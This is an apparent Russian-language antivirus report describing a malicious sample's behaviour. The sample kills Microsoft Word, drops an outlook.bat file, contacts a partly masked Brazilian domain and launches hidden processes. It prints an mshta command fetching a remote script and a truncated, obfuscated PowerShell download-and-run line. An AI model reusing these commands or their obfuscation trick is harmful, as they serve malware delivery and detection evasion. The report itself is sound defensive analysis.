Техническая информация
Вредоносные функции
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im WINWORD.EXE
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\outlook.bat
Сетевая активность
Подключается к
- 'fa####rade.com.br':80
UDP
- DNS ASK fa####rade.com.br
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='http://fa####rade.com.br/wp-includes/certificates/off/3.txt';$t1='(New-OS'.Replace('...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\ping.exe' -n 8 127.0.0.1
- '<SYSTEM32>\cmd.exe' /c start /min taskkill /f /im WINWORD.EXE
- '<SYSTEM32>\mshta.exe' http://fa####rade.com.br/wp-includes/certificates/4.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='http://fa####rade.com.br/wp-includes/certificates/off/3.txt';$t1='(New-OS'.Replace('...
